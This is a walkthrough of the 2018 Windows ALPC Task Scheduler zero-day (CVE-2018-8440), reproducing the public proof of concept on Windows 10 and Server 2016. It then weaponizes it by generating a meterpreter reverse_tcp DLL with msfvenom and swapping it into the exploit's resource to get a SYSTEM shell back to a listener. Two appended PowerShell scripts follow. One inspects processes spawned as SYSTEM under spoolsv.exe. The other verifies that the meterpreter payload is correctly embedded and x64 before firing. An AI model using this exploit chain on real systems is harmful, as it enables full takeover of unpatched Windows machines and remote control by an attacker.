ALPC bug 0day

Last updated 6 years ago

A 0day local privilege escalation for Windows was published on Twitter on August 28th, 2018 by @SandboxEscaper, whose account was pulled shortly afterwards. The PoC is on Github: https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar (The Register covered it as "Windows 0-day pops up out of nowhere"). The video posted with the PoC wasn't very clear, so I made a quick reproduction to verify whether it works, and it certainly does.

How to use

  • As Administrator, open Process Explorer (right click, "Run as administrator").

  • As a regular user, launch notepad. If you open it from cmd, notepad shows up in Process Explorer as a child process of that cmd, running in the user context you launched it with. Note the PID of the notepad process; in this run it was 3872.

  • If you want to see username and integrity level in Process Explorer, go to View -> Select Columns and check those columns.

Now have a look at the process spoolsv.exe, which is where the action is going to happen. Nothing much here yet.

Now fire the exploit off and see what happens (this is demonstrated in the PoC video). We pass the PID of the notepad process we spawned earlier, 3872.

It appears that nothing is happening, but take a look at spoolsv in Process Explorer again.

Bham! cmd.exe with the subprocesses conhost and notepad has spawned as SYSTEM, as a child of spoolsv.exe!

Windows 10 - works!

0day priv esc confirmed on Windows 10 1803. No patch had been released by MS at the time of writing (28.08.2018); Microsoft later fixed the Task Scheduler ALPC bug as CVE-2018-8440 in the September 2018 security updates.

This could probably be tweaked to open an actual cmd window as SYSTEM instead of a windowless process in the background.

Edit on the above: @plaintext notified me that the processes spawn in session 0, which is why they won't be visible to the user, who is working in session 1. If you toggle the Session column in Process Explorer's Select Columns panel you can see that very clearly.

Server 2016 - works

Windows 7 - Nothing happens

Weaponization maybe?

After reading the source code I discovered that notepad is launched from an exploit.dll that is added to the exploit DLL as a resource. This can be seen at lines 101-105 in the source code:

//Payload is included as a resource, you need to modify this resource accordingly.
HRSRC myResource = ::FindResource(mod, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA);
unsigned int myResourceSize = ::SizeofResource(mod, myResource);
HGLOBAL myResourceData = ::LoadResource(mod, myResource);
void* pMyBinaryData = ::LockResource(myResourceData);

Clicking that resource in CFF Explorer, we can see the embedded exploit.dll, which in the PoC just spawns notepad. It can't be read from the project as it stands, since I don't have the file at the absolute path the project refers to.

So instead of recompiling and fixing the 500 errors I got from Visual Studio, I decided it was easier to replace the DLL directly as a resource with CFF Explorer. But before I did that I had to prepare the payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.0.16 lport=444 -f dll -o lol.dll

Select "Replace Resource (raw)" in CFF Explorer and provide lol.dll. Then save ALPC-TaskSched-LPE.dll as a new file. The entire exploit, payload included, is now embedded in that one DLL file.

So we fire off the exploit again, just like we did above, with a multi/handler for windows/x64/meterpreter/reverse_tcp listening on 10.0.0.16:444, and wait for our shell to come back.

Woop de doo, we got a SYSTEM meterpreter.

Tools referenced: Process Explorer, CFF Explorer.
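The session 0 observation above is easy to miss in a GUI, so here is a check for the result of firing the exploit (either the notepad PoC or the weaponized DLL). This is an added example, not code from the PoC or from this page: it walks the process tree under spoolsv.exe with WMI and flags any descendant owned by SYSTEM that lives in a session other than the one the script runs in. Run it from an elevated PowerShell so GetOwner() works on other users' processes; process names and the 'NT AUTHORITY\SYSTEM' string are the standard Windows values, everything else is assumed.

```powershell
# Added example (not part of the PoC or the page): enumerate descendants of
# spoolsv.exe with their owner, session and command line, so that a SYSTEM
# cmd.exe spawned in session 0 is visible even though no window ever appears
# in the interactive session (session 1) we are logged into.

function Get-SpoolerChildren {
    param(
        [string]$ParentName = 'spoolsv.exe'   # the service process the exploit hijacks
    )
    $all     = Get-CimInstance -ClassName Win32_Process
    $parents = $all | Where-Object { $_.Name -ieq $ParentName }
    if (-not $parents) { throw "no process named $ParentName found" }

    # Breadth-first walk: direct children of spoolsv, then their descendants
    # (cmd.exe -> conhost.exe / notepad.exe in the PoC). Note that
    # ParentProcessId is a plain number, so a reused PID can in principle
    # attach an unrelated process to the tree; check CreationDate if in doubt.
    $queue  = New-Object 'System.Collections.Generic.Queue[object]'
    foreach ($p in $parents) { $queue.Enqueue($p) }
    $seen   = @{}
    $result = @()
    while ($queue.Count -gt 0) {
        $cur = $queue.Dequeue()
        foreach ($child in ($all | Where-Object { $_.ParentProcessId -eq $cur.ProcessId })) {
            if ($seen.ContainsKey($child.ProcessId)) { continue }
            $seen[$child.ProcessId] = $true
            $owner = Invoke-CimMethod -InputObject $child -MethodName GetOwner
            $result += [pscustomobject]@{
                Pid       = $child.ProcessId
                ParentPid = $child.ParentProcessId
                Name      = $child.Name
                Owner     = if ($owner.ReturnValue -eq 0) { "$($owner.Domain)\$($owner.User)" } else { '<unknown>' }
                Session   = $child.SessionId
                Command   = $child.CommandLine
            }
            $queue.Enqueue($child)
        }
    }
    return $result
}

$mySession = (Get-Process -Id $PID).SessionId
$children  = Get-SpoolerChildren
$children | Format-Table -AutoSize

# Anything owned by SYSTEM in a session other than ours is the exploit's
# handiwork: it runs as SYSTEM but in session 0, hence no visible window.
$children |
    Where-Object { $_.Owner -eq 'NT AUTHORITY\SYSTEM' -and $_.Session -ne $mySession } |
    ForEach-Object {
        "[+] $($_.Name) (PID $($_.Pid)) running as SYSTEM in session $($_.Session), invisible from session $mySession"
    }
```

On a clean box the walk returns nothing, because the spooler normally has no children at all; after the exploit you should see cmd.exe with conhost.exe and notepad.exe (or, with the weaponized DLL, whatever the payload spawns) owned by SYSTEM in session 0.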
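The weaponization step above trusts CFF Explorer to have replaced the resource correctly, and a wrong resource ID or a 32-bit payload fails silently when the exploit later runs. The following is an added example, not code from the PoC or the page, that reads the RCDATA resource back out of the patched ALPC-TaskSched-LPE.dll with the same Win32 calls the exploit source uses (FindResource, SizeofResource, LoadResource, LockResource), compares its SHA-256 to the msfvenom output and checks the payload's PE machine type. Assumptions: the numeric value of IDR_RCDATA1 is 101 (look it up in the PoC's resource.h or in CFF Explorer and adjust -ResourceId), the patched DLL is saved as ALPC-TaskSched-LPE-patched.dll, and lol.dll is the msfvenom output from the page. The DLL is mapped with LOAD_LIBRARY_AS_DATAFILE so its DllMain never executes.

```powershell
# Added example (not from the PoC or the page): verify the payload embedded as
# an RCDATA resource in the patched exploit DLL. Resource ID 101 and the file
# names are assumptions; change them to match your build.

Add-Type -Namespace Win32 -Name Res -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern IntPtr LoadLibraryEx(string lpFileName, IntPtr hFile, uint dwFlags);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr FindResource(IntPtr hModule, IntPtr lpName, IntPtr lpType);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern uint SizeofResource(IntPtr hModule, IntPtr hResInfo);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr LoadResource(IntPtr hModule, IntPtr hResInfo);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr LockResource(IntPtr hResData);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool FreeLibrary(IntPtr hModule);
'@

function Get-EmbeddedRcData {
    param(
        [Parameter(Mandatory)][string]$DllPath,
        [int]$ResourceId = 101            # assumed value of IDR_RCDATA1
    )
    $LOAD_LIBRARY_AS_DATAFILE = 0x2       # map as data only: DllMain does not run,
                                          # and a 64-bit DLL loads from 32-bit PowerShell
    $RT_RCDATA = 10                       # MAKEINTRESOURCE(RT_RCDATA)
    $mod = [Win32.Res]::LoadLibraryEx((Resolve-Path $DllPath).Path, [IntPtr]::Zero, $LOAD_LIBRARY_AS_DATAFILE)
    if ($mod -eq [IntPtr]::Zero) {
        throw "LoadLibraryEx failed, error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    try {
        # Same sequence as lines 101-105 of the exploit source.
        $hRes = [Win32.Res]::FindResource($mod, [IntPtr]$ResourceId, [IntPtr]$RT_RCDATA)
        if ($hRes -eq [IntPtr]::Zero) { throw "RCDATA resource $ResourceId not found in $DllPath" }
        $size  = [int][Win32.Res]::SizeofResource($mod, $hRes)
        $ptr   = [Win32.Res]::LockResource([Win32.Res]::LoadResource($mod, $hRes))
        $bytes = New-Object byte[] $size
        [Runtime.InteropServices.Marshal]::Copy($ptr, $bytes, 0, $size)
        return $bytes
    } finally {
        [void][Win32.Res]::FreeLibrary($mod)
    }
}

function Get-PeMachine([byte[]]$pe) {
    # IMAGE_DOS_HEADER.e_lfanew -> "PE\0\0" -> IMAGE_FILE_HEADER.Machine
    if ($pe.Length -lt 0x40 -or $pe[0] -ne 0x4D -or $pe[1] -ne 0x5A) { return 0 }
    $peOff = [BitConverter]::ToInt32($pe, 0x3C)
    return [BitConverter]::ToUInt16($pe, $peOff + 4)
}

$embedded = Get-EmbeddedRcData -DllPath .\ALPC-TaskSched-LPE-patched.dll -ResourceId 101
$payload  = [IO.File]::ReadAllBytes((Resolve-Path .\lol.dll).Path)

$sha = [Security.Cryptography.SHA256]::Create()
$hEmbedded = [BitConverter]::ToString($sha.ComputeHash($embedded)) -replace '-'
$hPayload  = [BitConverter]::ToString($sha.ComputeHash($payload))  -replace '-'

"embedded resource: {0} bytes, SHA256 {1}" -f $embedded.Length, $hEmbedded
if ($hEmbedded -eq $hPayload) { "[+] resource is byte-identical to lol.dll; the raw replace took" }
else { "[-] resource differs from lol.dll ({0} bytes); redo the Replace Resource (raw) step" -f $payload.Length }

# spoolsv.exe is 64-bit on the tested systems, so the dropped DLL must be x64
# (IMAGE_FILE_MACHINE_AMD64 = 0x8664); a 32-bit payload would simply fail to load.
switch (Get-PeMachine $embedded) {
    0x8664  { "[+] payload is x64, matches the 64-bit spooler" }
    0x014C  { "[-] payload is x86; regenerate with windows/x64/meterpreter/reverse_tcp" }
    default { "[-] resource is not a PE image at all" }
}
```

Run this from the directory holding both files before firing the exploit. The FreeLibrary in the finally block matters: a data-file mapping still holds the patched DLL open, and the exploit will fail to overwrite or copy a file that another process has mapped.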